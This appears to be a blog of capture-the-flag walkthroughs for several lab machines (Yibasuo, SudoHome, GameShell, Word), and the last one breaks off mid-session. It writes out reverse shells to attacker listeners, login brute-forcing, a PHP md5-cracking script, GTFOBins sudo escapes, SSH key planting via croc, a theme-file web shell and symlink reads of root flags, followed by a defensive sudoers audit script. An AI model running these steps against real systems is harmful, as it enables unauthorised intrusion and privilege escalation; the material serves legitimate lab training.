Scan 192.168.3.248 with fscan

fscan.exe -h 192.168.3.248    (windows)
./fscan -h 192.168.3.248      (linux)

Scan with nmap

Found ports 21 (ftp), 22 (ssh) and 80 (http); connect with

ftp 192.168.3.248 21

Since the scan showed anonymous login is allowed, use anonymous as the name with an empty password; just press enter

Download it locally

get creds.txt

Then cat it and it turns out to be wrong, but there's a piece of information here

220 (vsFTPd 2.3.4)

Search for it

https://blog.csdn.net/m0_62670778/article/details/138683346

But it couldn't be reached using the tool.

Then

ftp 192.168.3.248 21
name: anonymous:)
pass: just press enter
Found it doesn't work

Then check port 80; it's a login page, brute-force it directly: admin/password123

Once logged in there's a place to enter commands, but some are not authorized

ls /usr/bin
ls /usr/bin > file.txt

Brute-forcing shows busybox is permitted

Enter the command directly to get a reverse shell
busybox nc 192.168.3.236 8888 -e /bin/bash

Reverse shell succeeded

/usr/bin/script -qc /bin/bash /dev/null   stabilize the shell

Then

www-data@Yibasuo:/var/www/html/secure$ cd /home
cd /home
www-data@Yibasuo:/home$ ls
ls
ftp todd
www-data@Yibasuo:/home$ cd ./tod
cd ./tod
bash: cd: ./tod: No such file or directory
www-data@Yibasuo:/home$ cd ./todd
cd ./todd
www-data@Yibasuo:/home/todd$ cat u*
cat u*
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}

root

As mentioned earlier, there was a vulnerability I hadn't exploited; that vulnerability does get you in, but there was no permission to make use of it. Once inside, running ss -lntup shows port 6200 is open,

and port 6200 has something written into it; just connect to it directly for a shell, and root is obtained

www-data@Yibasuo:/var/www/html/secure$ ss -lntup
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:6200 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
www-data@Yibasuo:/var/www/html/secure$ busybox nc 127.0.0.1 6200
busybox nc 127.0.0.1 6200
ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd /root
cd /root
ls
ls
root.txt
cat root.txt
cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40}

First time getting root while the box was still active, awesome 😁😁😁

???

Sudohome

user1

Boot the box; the scan turns up ports 80, 21 and 25

└─# nmap  192.168.3.142                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-24 19:30 CST
Nmap scan report for 192.168.3.142
Host is up (0.0011s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:

Port 25 doesn't seem useful, so look at port 80

curl 192.168.3.142
<--try ssh-->

So try connecting remotely

ssh ll@192.168.3.142
user1:0woA8Sr7I83R0ZwmnTcH
The username and password are disclosed

Connect remotely directly

user1@SudoHome:~$ ls
password.txt
user1@SudoHome:~$ sudo -l
Matching Defaults entries for user1 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on SudoHome:
  (user2) NOPASSWD: /usr/bin/du

user2

du can be run as user2 without a password

user1@SudoHome:~$ sudo -u user2 /usr/bin/du --help
Usage: /usr/bin/du [OPTION]... [FILE]...
or: /usr/bin/du [OPTION]... --files0-from=F
Summarize disk usage of the set of FILEs, recursively for directories.

Mandatory arguments to long options are mandatory for short options too.
-0, --null           end each output line with NUL, not newline
-a, --all             write counts for all files, not just directories
    --apparent-size   print apparent sizes, rather than disk usage; although
                        the apparent size is usually smaller, it may be
                        larger due to holes in ('sparse') files, internal
                        fragmentation, indirect blocks, and the like
-B, --block-size=SIZE scale sizes by SIZE before printing them; e.g.,
                          '-BM' prints sizes in units of 1,048,576 bytes;
                          see SIZE format below
-b, --bytes           equivalent to '--apparent-size --block-size=1'
-c, --total           produce a grand total
-D, --dereference-args dereference only symlinks that are listed on the
                        command line
-d, --max-depth=N     print the total for a directory (or file, with --all)
                        only if it is N or fewer levels below the command
                        line argument; --max-depth=0 is the same as
                        --summarize
    --files0-from=F   summarize disk usage of the
                        NUL-terminated file names specified in file F;
                        if F is -, then read names from standard input
-H                   equivalent to --dereference-args (-D)
-h, --human-readable print sizes in human readable format (e.g., 1K 234M 2G)
    --inodes         list inode usage information instead of block usage
-k                   like --block-size=1K
-L, --dereference     dereference all symbolic links
-l, --count-links     count sizes many times if hard linked
-m                   like --block-size=1M
-P, --no-dereference don't follow any symbolic links (this is the default)
-S, --separate-dirs   for directories do not include size of subdirectories
    --si             like -h, but use powers of 1000 not 1024
-s, --summarize       display only a total for each argument
-t, --threshold=SIZE exclude entries smaller than SIZE if positive,
                        or entries greater than SIZE if negative
    --time           show time of the last modification of any file in the
                        directory, or any of its subdirectories
    --time=WORD       show time as WORD instead of modification time:
                        atime, access, use, ctime or status
    --time-style=STYLE show times using STYLE, which can be:
                          full-iso, long-iso, iso, or +FORMAT;
                          FORMAT is interpreted like in 'date'
-X, --exclude-from=FILE exclude files that match any pattern in FILE
    --exclude=PATTERN   exclude files that match PATTERN
-x, --one-file-system   skip directories on different file systems
    --help     display this help and exit
    --version output version information and exit

Display values are in units of the first available SIZE from --block-size,
and the DU_BLOCK_SIZE, BLOCK_SIZE and BLOCKSIZE environment variables.
Otherwise, units default to 1024 bytes (or 512 if POSIXLY_CORRECT is set).

The SIZE argument is an integer and optional unit (example: 10K is 10*1024).
Units are K,M,G,T,P,E,Z,Y (powers of 1024) or KB,MB,... (powers of 1000).

GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/du>
or available locally via: info '(coreutils) du invocation'
 --files0-from=F   summarize disk usage of the
                        NUL-terminated file names specified in file F;
                        if F is -, then read names from standard input

The key is the --files0-from option: it reads a list of file names separated by the ASCII NUL character (\0) from file F, which avoids the parsing errors caused by file names containing spaces or newlines. But when F is a file whose content is not a list of names, for example password.txt, du treats the content as a file name; that file doesn't exist, so du reports an error saying so, and the error message echoes the "file name", which is the content of the file above.

sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt
user1@SudoHome:~$ sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt
/usr/bin/du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory

user3

user2@SudoHome:~$ sudo -l
Matching Defaults entries for user2 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user2 may run the following commands on SudoHome:
  (user3) NOPASSWD: /usr/bin/file

Check what this command does

sudo -u user2 /usr/bin/du --help
https://gtfobins.github.io/gtfobins/file/#file-read  (you can also just search how to escalate with this command)
LFILE=file_to_read
sudo file -f $LFILE
user2@SudoHome:~$ sudo -u user3 /usr/bin/file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)

user4

user3@SudoHome:~$ sudo -l
Matching Defaults entries for user3 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user3 may run the following commands on SudoHome:
  (user4) NOPASSWD: /usr/bin/mc
user3@SudoHome:~$ mc -help
Usage:
mc [OPTION…] [this_dir] [other_panel_dir]

GNU Midnight Commander 4.8.26


Help Options:
-h, --help               Show help options
--help-all               Show all help options
--help-terminal           Terminal options
--help-color             Color options

Application Options:
-V, --version             Displays the current version
-f, --datadir             Print data directory
-F, --datadir-info       Print extended info about used data directories
--configure-options       Print configure options
-P, --printwd=<file>     Print last working directory to specified file
-U, --subshell           Enables subshell support (default)
-u, --nosubshell         Disables subshell support
-l, --ftplog=<file>       Log ftp dialog to specified file
-v, --view=<file>         Launches the file viewer on a file
-e, --edit=<file> ...     Edit files


Please send any bug reports (including the output of 'mc -V')

Check what the mc command does

After -u it enters an interactive shell

-u, --nosubshell          Disables subshell support
user@SudoHome:/home/user3$

It looks like this; type whoami and then exit, and it shows user4

Directly cat /home/user4/password.txt

Success

user4@SudoHome:/home/user3$ whoami
user4

user4@SudoHome:/home/user3$ cat /home/user4/password.txt
B0aWh2XHpp5hOIVtCUbn

user5

user4@SudoHome:~$ sudo -l
Matching Defaults entries for user4 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user4 may run the following commands on SudoHome:
  (user5) NOPASSWD: /usr/bin/ssh
It's ssh
user4@SudoHome:~$ ssh --help
unknown option -- -
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
          [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
          [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
          [-i identity_file] [-J [user@]host[:port]] [-L address]
          [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
          [-Q query_option] [-R address] [-S ctl_path] [-W host:port]
          [-w local_tun[:remote_tun]] destination [command]
https://gtfobins.github.io/gtfobins/ssh/#sudo
user4@SudoHome:~$ sudo  -u  user5 /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ ls
password.txt
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI

user6

user5@SudoHome:~$ sudo -l
Matching Defaults entries for user5 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user5 may run the following commands on SudoHome:
  (user6) NOPASSWD: /usr/bin/rev
https://gtfobins.github.io/gtfobins/rev/#sudo
user5@SudoHome:~$ sudo -u user6 /usr/bin/rev /home/user6/password.txt | rev
Z5cWU36wQhxAVGJbGwoL

user7

user6@SudoHome:~$ sudo -l
Matching Defaults entries for user6 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user6 may run the following commands on SudoHome:
  (user7) NOPASSWD: /usr/bin/cp
user6@SudoHome:/home/user7$ ls -al
total 24
drwxr-xr-x 2 user7 user7 4096 Nov 16 08:35 .
drwxr-xr-x 12 root root 4096 Nov 16 08:35 ..
-rw-r--r-- 1 user7 user7 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 user7 user7 3526 Apr 18 2019 .bashrc
-rw------- 1 user7 user7   21 Nov 16 08:35 password.txt
-rw-r--r-- 1 user7 user7 807 Apr 18 2019 .profile
.profile is readable
https://gtfobins.github.io/gtfobins/cp/#suid
user6@SudoHome:/home/user7$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /home/user7/.profile
user6@SudoHome:/home/user7$ cat .pro*
HLoKAOu86miWIYKdyVx3

user8

user7@SudoHome:~$ sudo -l
Matching Defaults entries for user7 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user7 may run the following commands on SudoHome:
  (user8) NOPASSWD: /usr/bin/mail
user7@SudoHome:~$ touch /tmp/111
user7@SudoHome:~$ sudo -u user8 /usr/bin/mail -f /tmp/111
Mail version 8.1.2 01/15/2001. Type ? for help.
"/tmp/111": 0 messages [Read only]
& !/bin/bash
user8@SudoHome:/home/user7$ cat /home/user8/password.txt
UxeGoUq8xqBRxyWVQPYK

user9

user8@SudoHome:~$ sudo -l
Matching Defaults entries for user8 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user8 may run the following commands on SudoHome:
  (user9) NOPASSWD: /usr/bin/wfuzz
wfuzz is a fuzzing tool; each line of the wordlist file is used as the FUZZ payload, and wfuzz prints that line verbatim in the Payload column of its output table, thereby leaking the password.
user8@SudoHome:~$ sudo -u user9 /usr/bin/wfuzz -w /home/user9/password.txt http://127.0.0.1/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1/FUZZ
Total requests: 1

=====================================================================
ID           Response   Lines   Word       Chars       Payload                  
=====================================================================

000000001:   404       9 L     31 W       271 Ch     "peqkSBCDKvVxxNwcq1j4"  

Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0

user10

user9@SudoHome:~$ sudo -l
Matching Defaults entries for user9 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user9 may run the following commands on SudoHome:
  (user10) NOPASSWD: /usr/bin/md5sum

md5sum

user9@SudoHome:~$ sudo -u user10 /usr/bin/md5sum --help
Usage: /usr/bin/md5sum [OPTION]... [FILE]...
Print or check MD5 (128-bit) checksums.

With no FILE, or when FILE is -, read standard input.

-b, --binary         read in binary mode
-c, --check         read MD5 sums from the FILEs and check them
    --tag           create a BSD-style checksum
-t, --text           read in text mode (default)
-z, --zero           end each output line with NUL, not newline,
                      and disable file name escaping

The following five options are useful only when verifying checksums:
    --ignore-missing don't fail or report status for missing files
    --quiet         don't print OK for each successfully verified file
    --status         don't output anything, status code shows success
    --strict         exit non-zero for improperly formatted checksum lines
-w, --warn           warn about improperly formatted checksum lines

    --help     display this help and exit
    --version output version information and exit

The sums are computed as described in RFC 1321. When checking, the input
should be a former output of this program. The default mode is to print a
line with checksum, a space, a character indicating input mode ('*' for binary,
' ' for text or where binary is insignificant), and name for each FILE.

GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/md5sum>
or available locally via: info '(coreutils) md5sum invocation'

md5sum can compute the md5 of a string/file

Looking at the file, it's 13k

-rw-------  1 user10 user10   13 Nov 16 08:35 password.txt

Look at some of its other things

user9@SudoHome:~$ echo '1' > 1.txt
user9@SudoHome:~$ ls -al
total 32
drwxr-xr-x 3 user9 user9 4096 Nov 24 07:27 .
drwxr-xr-x 12 root root 4096 Nov 16 08:35 ..
-rw-r--r-- 1 user9 user9   2 Nov 24 07:27 1.txt
-rw-r--r-- 1 user9 user9 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 user9 user9 3526 Apr 18 2019 .bashrc
drwxr-xr-x 3 user9 user9 4096 Nov 24 07:20 .config
-rw------- 1 user9 user9   21 Nov 16 08:35 password.txt
-rw-r--r-- 1 user9 user9 807 Apr 18 2019 .profile
user9@SudoHome:~$ cat 1.txt
1
user9@SudoHome:~$ echo '11' > 11.txt
user9@SudoHome:~$ ls -al
total 36
drwxr-xr-x 3 user9 user9 4096 Nov 24 07:28 .
drwxr-xr-x 12 root root 4096 Nov 16 08:35 ..
-rw-r--r-- 1 user9 user9   3 Nov 24 07:28 11.txt
-rw-r--r-- 1 user9 user9   2 Nov 24 07:27 1.txt

An extra character is added automatically; it should be a newline

If echo is redirected with the -n option, there's no extra newline

So user10's password should be 12 bytes plus a newline

user9@SudoHome:~$ sudo -u user10 md5sum ../user10/password.txt
65e31d336be184593812c18533fa4fa2 ../user10/password.txt
Look at its md5 hash
<?php
// Crack the md5sum of user10's password.txt by hashing each rockyou line.
// fgets() keeps the trailing "\n", which matches the newline in the file.
$targetHash = '65e31d336be184593812c18533fa4fa2';
$start_time = microtime(true);
$file = '/usr/share/wordlists/rockyou.txt';
$handle = fopen($file, "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
        if (md5($line) === $targetHash) {
            $end_time = microtime(true);
            $elapsed_time = $end_time - $start_time;
            echo "Found: " . $line;
            echo "Time elapsed: " . round($elapsed_time, 4) . " seconds\n";
            fclose($handle);
            exit;
        }
    }
    fclose($handle);
    $end_time = microtime(true);
    $elapsed_time = $end_time - $start_time;
    echo "Not found.\n";
    echo "Search completed in: " . round($elapsed_time, 4) . " seconds\n";
}
?>

Brute-force directly with the script

php try123.php
Found: morrinsville
Time elapsed: 0.0666 seconds

root

user10@SudoHome:~$ sudo -l
Matching Defaults entries for user10 on SudoHome:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user10 may run the following commands on SudoHome:
  (ALL) NOPASSWD: /usr/bin/cat /home/user10/.important

Use a symlink to point .important at /root/user.txt and /root/root.txt in turn, read it, then delete it

user10@SudoHome:~$ rm -f .important
user10@SudoHome:~$ ln -s /root/root.txt .important
user10@SudoHome:~$ sudo /usr/bin/cat /home/user10/.important
flag{root-f522d1d715970073a6413474ca0e0f63}
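Every hop on this box, from du through md5sum to the final cat rule, is a NOPASSWD entry handing a file-reading or shell-escaping binary to the next user. Added example, not the box's own sudoers: a small audit that walks a sudoers-style file and flags NOPASSWD rules whose program is on a watch list. WATCHLIST is an assumption built from the binaries seen in this chain, and the sample rules are constructed to mirror it.

```shell
# Added example: flag NOPASSWD sudoers rules for shell-escape/file-read binaries.
# WATCHLIST is an assumed list drawn from this box; extend it from GTFOBins.
WATCHLIST="du file mc ssh rev cp mail wfuzz md5sum cat neofetch steghide croc"

# Print "user -> runas: command" for every NOPASSWD rule in $1 whose program
# basename is on WATCHLIST. Rule shape: user host=(runas) NOPASSWD: command
audit_sudoers() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' |
    while IFS= read -r line; do
        user=${line%%[[:space:]]*}
        case $line in
            *"("*) runas=${line#*"("}; runas=${runas%%")"*} ;;
            *)     runas=root ;;                 # no (runas) list means root
        esac
        cmd=${line#*NOPASSWD:}
        cmd=${cmd#"${cmd%%[![:space:]]*}"}      # strip leading whitespace
        bin=${cmd%%[[:space:]]*}                # the program is the first word
        base=${bin##*/}
        for w in $WATCHLIST; do
            if [ "$base" = "$w" ]; then
                echo "$user -> $runas: $cmd"
            fi
        done
    done
}

# Number of flagged rules in $1.
count_risky() {
    audit_sudoers "$1" | wc -l | tr -d ' '
}

# Constructed sample mirroring part of the SudoHome chain.
SUDOERS_SAMPLE=$(mktemp)
cat > "$SUDOERS_SAMPLE" <<'EOF'
# constructed sample, not a real sudoers file
Defaults env_reset
root    ALL=(ALL:ALL) ALL
user1   ALL=(user2) NOPASSWD: /usr/bin/du
user2   ALL=(user3) NOPASSWD: /usr/bin/file
user3   ALL=(user4) NOPASSWD: /usr/bin/mc
user9   ALL=(user10) NOPASSWD: /usr/bin/md5sum
user10  ALL=(ALL) NOPASSWD: /usr/bin/cat /home/user10/.important
backup  ALL=(root) NOPASSWD: /usr/local/bin/run-backup
EOF

audit_sudoers "$SUDOERS_SAMPLE"
echo "flagged: $(count_risky "$SUDOERS_SAMPLE")"
```

Note that restricting the argument, as the user10 rule does, is not enough on its own: the audit still flags it because cat follows symlinks, which is exactly how the root flag was read above. Run it against /etc/sudoers and each file in /etc/sudoers.d as root (they are mode 0440).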

gameshell

Tried several times in between and never got in 🤡

nmap 192.168.3.74
ports 22 80 7681
Going into 7681 it's an interactive shell, a little game. Forget it, I don't want to play it; just reverse shell and look around locally
busybox nc 192.168.3.219 4444 -e /bin/bash
nc -lvvp 4444

Run linpeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

Found credentials shown

admin:nimda
Forward it locally: ssh -N -R 127.0.0.1:8888:127.0.0.1:9876 kali@192.168.3.219
[mission 1] $ ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
The authenticity of host '192.168.3.219 (192.168.3.219)' can't be established.
ECDSA key fingerprint is SHA256:nUWirmUT31d7OjVHs33wBQ0lYTiXqg5uVTRfSEYj64E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
wea5e1@192.168.3.219's password:

It asks for a username and password; log in with the ones above

eviden@GameShell:/$ ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
eviden@GameShell:/$ busybox nc 192.168.3.219 443 -e /bin/bash

Reverse shell again

/usr/bin/script -qc /bin/bash /dev/null
eviden@GameShell:/$ id
id
uid=1001(eviden) gid=1001(eviden) groups=1001(eviden)
eviden@GameShell:/$ sudo -l
sudo -l
Matching Defaults entries for eviden on GameShell:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eviden may run the following commands on GameShell:
(ALL) NOPASSWD: /usr/local/bin/croc

croc, look it up, is a file-transfer tool; it's writable and runs with sudo privileges, so just send a public key over

kali:
cat ~/.ssh/id_ed25519.pub > authorized_keys
croc --ip 192.168.3.219 send authorized_keys
croc --ip 192.168.3.74 send authorized_keys
Sending 'authorized_keys' (95 B)
Code is: 7312-bridge-africa-brenda

On the other computer run:
(For Windows)
croc 7312-bridge-africa-brenda
(For Linux/macOS)
CROC_SECRET="7312-bridge-africa-brenda" croc

Sending (->192.168.3.74:42810)
authorized_keys 100% |████████████████████| (95/95 B, 219 kB/s)
eviden@GameShell:
eviden@GameShell:/$ sudo croc --yes --out /root/.ssh
sudo croc --yes --out /root/.ssh
Enter receive code: 7312-bridge-africa-brenda
Enter receive code: 7312-bridge-africa-brenda
Receiving 'authorized_keys' (95 B)

Receiving (<-192.168.3.219:9009)

Overwrite 'authorized_keys'? (y/N) (use --overwrite to omit) y
y
authorized_keys 100% |████████████████████| (95/95 B, 32 kB/s)
─# ssh root@192.168.3.74 -i ~/.ssh/id_ed25519
The authenticity of host '192.168.3.74 (192.168.3.74)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.74' (ED25519) to the list of known hosts.
Linux GameShell 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@GameShell:~# id
uid=0(root) gid=0(root) groups=0(root)
root@GameShell:~#
Got root

word

user

Open the site and scan ports; still 80 and 22

Then visit port 80; the scan turns up banner.php and wordpress. Visiting banner.php, it's a , and access would hang midway; when I did user I borrowed the HTB approach directly and added an entry in /etc/hosts

10.247.102.175  word.dsz
Using dirsearch, gobuster dir and wpscan, found http://word.dsz/wordpress/wp-content/uploads

It's a directory listing containing pass.txt; then use

wpscan --url http://10.247.102.175/wordpress --enumerate u

Found a root user, and its backend was found in the earlier scan

root/S9ZF6mtLdHfmr8PmCq3i (well, I tried to ssh in directly, it kept hanging, and I even went and asked 努力哥 🤡)

Logged in successfully; then, borrowing the babycms idea, find a php file in its theme editor to plant a reverse shell; I used the patterns/banner-about-book.php file

Then visit http://word.dsz/wordpress/wp-content/themes/twentytwentyfive/patterns/banner-about-book.php
nc -lvvp 4444              
listening on [any] 4444 ...
connect to [10.247.102.219] from word.dsz [10.247.102.175] 39364
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
<press/wp-content/themes/twentytwentyfive/patterns$ /usr/bin/script -qc /bin/bash /dev/null
<e/patterns$ /usr/bin/script -qc /bin/bash /dev/null
<press/wp-content/themes/twentytwentyfive/patterns$ cd /
cd /
www-data@Word:/$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
www-data@Word:/$ dpkg -V 2>/dev/null
dpkg -V 2>/dev/null
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? /usr/lib/mysql/plugin/auth_pam_tool_dir/auth_pam_tool
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
??5?????? c /etc/sudoers
??5?????? c /etc/sudoers.d/README
??5?????? c /etc/inspircd/inspircd.conf
??5?????? c /etc/inspircd/inspircd.motd
??5?????? c /etc/inspircd/inspircd.rules
??5?????? /usr/bin/top
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue
www-data@Word:/$ cat /usr/bin/top
cat /usr/bin/top
#!/bin/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh
Reverse shell succeeded, got user

root

The dpkg -V 2>/dev/null command above printed:
www-data@Word:/$ cat /usr/bin/top
cat /usr/bin/top
#!/bin/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh
cat banner.php
cat b*
<?php
// Set the page title and character encoding
$page_title = "定制你的SSH欢迎界面";
$saved_message = "";

// Handle the form submission
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['banner_text'])) {
    $banner_text = $_POST['banner_text'];
    $file_path = '/home/ssh-banner/banner.txt';

    // Make sure the directory exists
    $dir = dirname($file_path);
    if (!is_dir($dir)) {
        mkdir($dir, 0755, true);
    }

    // Try to save the file
    if (file_put_contents($file_path, $banner_text) !== false) {
        $saved_message = "Banner Saved. try ssh ";
    } else {
        $saved_message = "Banner Saved failed.";
    }
}

// Try to read the existing content
$current_content = "";
$file_path = '/home/ssh-banner/banner.txt';
if (file_exists($file_path)) {
    $current_content = htmlspecialchars(file_get_contents($file_path));
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title><?php echo $page_title; ?></title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f5f5f5;
            color: #333;
        }
        .container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            padding: 30px;
            margin-top: 20px;
        }
        h1 {
            color: #2c3e50;
            border-bottom: 2px solid #3498db;
            padding-bottom: 10px;
        }
        .form-group {
            margin-bottom: 20px;
        }
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        textarea {
            width: 100%;
            height: 200px;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-family: monospace;
            resize: vertical;
        }
        .btn {
            background-color: #3498db;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
        }
        .btn:hover {
            background-color: #2980b9;
        }
        .message {
            padding: 10px;
            margin: 15px 0;
            border-radius: 4px;
            text-align: center;
        }
        .success {
            background-color: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }
        .error {
            background-color: #f8d7da;
            color: #721c24;
            border: 1px solid #f5c6cb;
        }
        .preview {
            background-color: #2c3e50;
            color: #ecf0f1;
            border-radius: 4px;
            padding: 15px;
            margin-top: 20px;
            font-family: monospace;
            white-space: pre-wrap;
        }
        .preview-title {
            font-weight: bold;
            margin-bottom: 10px;
            color: #3498db;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1><?php echo $page_title; ?></h1>

        <?php if (!empty($saved_message)): ?>
        <div class="message <?php echo strpos($saved_message, '错误') !== false ? 'error' : 'success'; ?>">
            <?php echo $saved_message; ?>
        </div>
        <?php endif; ?>

        <form method="POST" action="">
            <div class="form-group">
                <label for="banner_text">SSH欢迎信息内容:</label>
                <textarea id="banner_text" name="banner_text" placeholder="在此输入SSH登录时显示的欢迎信息..."><?php echo $current_content; ?></textarea>
            </div>

            <button type="submit" class="btn">保存Banner</button>
        </form>

        <?php if (!empty($current_content)): ?>
        <div class="preview">
            <div class="preview-title">预览效果:</div>
            <?php echo nl2br($current_content); ?>
        </div>
        <?php endif; ?>
    </div>
</body>
</html>

Asked an AI directly:

This is an SSH welcome-message customization page; its core function is to write the user's input into the /home/ssh-banner/banner.txt file. Hidden in this scenario is a key privilege-escalation opening: by exploiting the way the SSH banner file is loaded, make the target automatically execute the commands we plant, ultimately obtaining a high-privilege (even root) shell.

And using jUOhu37yYllYiVxQNw8G from above, ssh login as ssh-banner succeeds

ssh-banner@Word:~$ ls -al
total 28
drwxr-xr-x 2 ssh-banner ssh-banner 4096 Nov 15 03:51 .
drwxr-xr-x 3 root       root       4096 Nov 14 21:59 ..
-rwxrwxrwx 1 root       root         47 Nov 29 08:46 banner.txt
lrwxrwxrwx 1 root       root         9 Nov 15 03:51 .bash_history -> /dev/null                                                                          
-rw-r--r-- 1 ssh-banner ssh-banner 220 Nov 14 21:59 .bash_logout
-rw-r--r-- 1 ssh-banner ssh-banner 3526 Nov 14 21:59 .bashrc
-rw-r--r-- 1 ssh-banner ssh-banner 807 Nov 14 21:59 .profile
-rw-r--r-- 1 root       root         44 Nov 14 22:10 user.txt
ssh-banner@Word:~$ ln -sf /root/root.txt banner.txt//

banner.txt becomes a "shortcut" to /root/root.txt

Connect via ssh directly

ssh-banner@Word:~$ ssh ssh-banner@10.247.102.175
The authenticity of host '10.247.102.175 (10.247.102.175)' can't be established.
